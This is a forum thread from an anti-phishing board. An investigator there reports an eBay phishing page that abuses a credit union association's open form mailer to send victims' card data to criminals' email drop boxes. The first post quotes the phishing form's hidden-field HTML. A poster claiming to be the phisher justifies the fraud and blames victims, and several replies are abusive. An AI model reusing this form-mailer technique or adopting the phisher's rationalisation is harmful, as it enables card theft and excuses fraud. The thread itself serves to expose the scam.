republican-creole
site Search:


 
    All Forums Hot Topics Gallery






how-to block ads


 
Search Topic:
Share Topic
Posting?
Post a:
Post a:
Links: ·Phish Tracker ·Anti-Phishing Work Group ·Avoid Phishing
AuthorAll Replies

MGD
Premium,MVM
join:2002-07-31
kudos:9

4 edits

reply to SYNACK

Credit Union Helps Romanian phishers collect victim's card data

The results of some of my digging on this phish now assigned number 3874 on phishtrack made me fall off my bar stool. So,..someone.. please recheck my homework, as this is almost unbelievable.

These Romanian phishers are actually using an open form mailer belonging to the Credit Union National Association (CUNA) www.creditunion.coop/ to mail the victim's data to their drop boxes. This Ebay phish on IP 87.52.113.246 in Denmark, sends the data collected here:
Ebay User ID

Ebay phish user id
and the card data here:

Ebay phish card entry
via the CUNA Credit Union's very own formailer: ht*tp://www.creditunion.coop/cgi-php/formtomail.php to the Romanian criminal's drop boxes at rudele@gmail.com and zuzzi@tycobb.net. They use Subject value = "Dandanaua"


<FORM name="main" method="post" action="http://www.creditunion.coop/cgi-php/formtomail.php">

<input type="hidden" name="from" value="rudele@gmail.com">

<input type="hidden" name="to" value="zuzzi@tycobb.net">

<input type="hidden" name="subject" value="Dandanaua">
<input type="hidden" name="nexturl" value="http://0x573471f6.boanxx16.adsl-dhcp.tele.dk/survey/ebay0605/done.html">

Ohhh wait..It gets even worse !!! While running the drop boxes through Google we find that CUNA www.creditunion.coop were themselves Phished by the same criminals a week ago on 08/24 from a hijacked road runner machine, again using their very own form mailer. Though I found and noted it at the time, its significance escaped me.

Not to add to the dismal irony here, but the Credit Union National Association's home page actually contains a prominent warning about being alert for phishing:


Maybe we can get this issue some front page attention so that they can be CLUED in to what is going on right under their noses.

I wonder if CUNA's form mailer keeps a copy of the mail, could they already have a list of their own and Ebay's phish victims??.

I assume the Paypal phish on the same machine that E_V See Profile pointed out may use the same same process:

PayPal phish same location
I would test it, but according to that source code the user ID and password is validated in real time with Paypal, and I do not have a spare valid credential to check it out with !!.

For the record, I posted the entire source code from the Ebay page in the 3874 phish comments.

MGD
Edit=added missing text


E_V
Premium
join:2000-09-29
Vancouver, BC
kudos:4

1 edit

Re: Credit Union Helps Romanian phishers collect victim's card d

said by MGD:

I would test it, but according to that source code the user ID and password is validated in real time with Paypal
Tried a few times
'Ran into problems sending Mail. Response: 535 auth failure'
add url:
»0x573471f6.boanxx16.adsl-dhcp.te···rify.php


Zuzzi

@aol.com

reply to MGD
Hey, guyz.

Funny, huh?

I`m not a "criminals", as u named me, i`m a regular girl, it happens in this case that i`m not even a boy ..., and i`m not so bad ..., i`m doing it because i need to, u come and live where i live and u`ll see that u`ll do the same.

In fact, nobody`s a criminal, is just that the americans, although are instructed how to detect scam and not to respond to it, they do it. It`s because they wanna do it, they simplly don`t care about their money! Nobody is making them give us money, we don`t put a gun upon them, it`s their choice. Who cares about what he has, is deleting the e-mail, who doesn`t, he give what we ask, what`s your problem?! IT`S THEIR CHOICE.Everybody knows about scam in US, if they don`t wanna open theier eyes is just their fu**ing problem, not yours! The true websites tells them how to beat scam, they don`t wanna beat it, so leave them alone and mind your own life, just delete the e`mail and that`s it, because i suppose u must have a family, a job, some hobbies, although u look lifeless...!

The NCUA is not helping anybody doing this, but the fact is that every server has vulnerabilities that can be exploited, even www.ebay.com, that costs some millions ..., it`s a metter of how bored u are so u can discover it, if u really want this!

U shouldn`t be so scared, because we don`t use all that cards in the end, just some of them . You panic for $10? In my country, some of us are lucky enough to have a job and work a month for $100-$200, how`s that sounds to u? And we never panic for nothing, and nobody looses his life on this stupid forum!

U may say what ever u like, u may report what ever u like, the thing stays the same.

And btw, about that 5 boxes, just the one from yahoo and the one from tycobb exists, u can try it, i`ll respond, clever guys! U can`t even read a simple code, but u wanna beat scam ...! Cool life u must have, at least from time to time we get some money from staying at the computer, but what about u?Do you get paid for reporting? Do u think u help them? Everyday of my life tells me that u don`t help nobody, we still can eat and pay the rent and school taxes doing this!

I wish u all the best, and sorry for the ones who experienced online fraud in the past, but IT`S JUST YOUR FAULT, STOP PLAYING A VICTIM, WE ARE THE VICTIMS OF THE STUPIDNESS OF SOME OF U, THAT PUT US IN THE RISCK TO GO TO JAIL, MAY BE WE COULD FOUND OTHER WAY OF LIVING IF WE DIDN`T KNOW THAT AMERICANS ARE STUPID.



E_V
Premium
join:2000-09-29
Vancouver, BC
kudos:4

LOL



Snowy
mIRC unix.ro UnderNet
Premium
join:2003-04-05
Kailua, HI
kudos:5

reply to Zuzzi
Maybe we can put a face on the smell
»utime.uv.ro/


Jon_Hanson
Mountain Dew Rules
Premium
join:2001-07-09
Gilbert, AZ

reply to Zuzzi

said by Zuzzi :

Hey, guyz.

Funny, huh?

I`m not a "criminals", as u named me, i`m a regular girl, it happens in this case that i`m not even a boy ..., and i`m not so bad ..., i`m doing it because i need to, u come and live where i live and u`ll see that u`ll do the same.

In fact, nobody`s a criminal, is just that the americans, although are instructed how to detect scam and not to respond to it, they do it. It`s because they wanna do it, they simplly don`t care about their money! Nobody is making them give us money, we don`t put a gun upon them, it`s their choice. Who cares about what he has, is deleting the e-mail, who doesn`t, he give what we ask, what`s your problem?! IT`S THEIR CHOICE.Everybody knows about scam in US, if they don`t wanna open theier eyes is just their fu**ing problem, not yours! The true websites tells them how to beat scam, they don`t wanna beat it, so leave them alone and mind your own life, just delete the e`mail and that`s it, because i suppose u must have a family, a job, some hobbies, although u look lifeless...!

The NCUA is not helping anybody doing this, but the fact is that every server has vulnerabilities that can be exploited, even www.ebay.com, that costs some millions ..., it`s a metter of how bored u are so u can discover it, if u really want this!

U shouldn`t be so scared, because we don`t use all that cards in the end, just some of them . You panic for $10? In my country, some of us are lucky enough to have a job and work a month for $100-$200, how`s that sounds to u? And we never panic for nothing, and nobody looses his life on this stupid forum!

U may say what ever u like, u may report what ever u like, the thing stays the same.

And btw, about that 5 boxes, just the one from yahoo and the one from tycobb exists, u can try it, i`ll respond, clever guys! U can`t even read a simple code, but u wanna beat scam ...! Cool life u must have, at least from time to time we get some money from staying at the computer, but what about u?Do you get paid for reporting? Do u think u help them? Everyday of my life tells me that u don`t help nobody, we still can eat and pay the rent and school taxes doing this!

I wish u all the best, and sorry for the ones who experienced online fraud in the past, but IT`S JUST YOUR FAULT, STOP PLAYING A VICTIM, WE ARE THE VICTIMS OF THE STUPIDNESS OF SOME OF U, THAT PUT US IN THE RISCK TO GO TO JAIL, MAY BE WE COULD FOUND OTHER WAY OF LIVING IF WE DIDN`T KNOW THAT AMERICANS ARE STUPID.
It's people like you that make all of us sick. You think you have the right to rip people off because of the conditions in your country? That's a good justification . If you really have skills and aren't just a "script kiddie" you should put your talent to work for good instead of fraud. How do you sleep at night knowing that you're stealing from people? You must have no conscience.

When you take something (especially money) from someone by false and fradulent means it is criminal in Romania or the United States. It's only a matter or time before you're caught and you've already lost your anonimity in this forum and our posts regularly show up high in the rankings in Google searches.

It's not that people are "stupid" it's that they don't realize that criminals like you can make an e-mail and a website look like their bank or whatever to give their information to. People will become educated or it will become impossible to make a website or e-mail look like something it's not and you'll be out of business.

I'm guessing you're more of the "script kiddie" variety (you take some tools that someone else made and don't really do any work of your own) because the people here have been able to easily take apart your work.

Have fun looking over your shoulder the rest of your life wondering when things will catch up to you.


your momma

@psu.edu

reply to Zuzzi

Re: Credit Union Helps Romanian phishers collect victim's card d

I think it is absolutley ridicoulous that you feel justified scamming americans, thinking that we should know about the scams already. That is like me coming to your country and robbing you at gunpoint, then saying, well you knew there was bad guys out here, why didn;t you just stay home. if you can explain the differance then you are better than me a t figuring this type of stuff out. Yes, America is better than the country you live in, and thats not our fault, this is the land our fathers gave us, and instead of focusing on robbing people from countries more renowned then ours, we put that energy into creating good. you should try it,maybe you won't go to hell.


LuckyYou

@67.97.x.x

reply to Zuzzi
I just gave you Cancer...it will appear in the form of a malignant mole on your back. Give yourself one year, six days and three hours to live. Didn't know the curse can be given to you this way? That's because people in your country are too stupid to learn about it. So it's not my fault.
Enjoy, dirtbag



Chango-Pango

@zoominternet.net

reply to Zuzzi
I know this sounds bad but oh well, ill never be on this forum ever again.

do what you can to survive.



hakan64

@rr.com

1 edit

reply to Zuzzi

Re: Credit Union Helps Romanian phishers collect victim's card d

i hope u burn in the hell! it is not about being stupid americans, it is about people who doesnt have a black heart like u. only criminal brain thinks about the way u think. it is ok to loose money for those people in this life because of u but once u die, u will pay for all that, trust me on this!

Sunday, 03-Jun 15:35:56 Terms of Use & Privacy | feedback | contact | Hosting by nac.net - DSL,Hosting & Co-lo
over 12.5 years online © 1999-2012 dslreports.com.
Most commented news this week
Hot Topics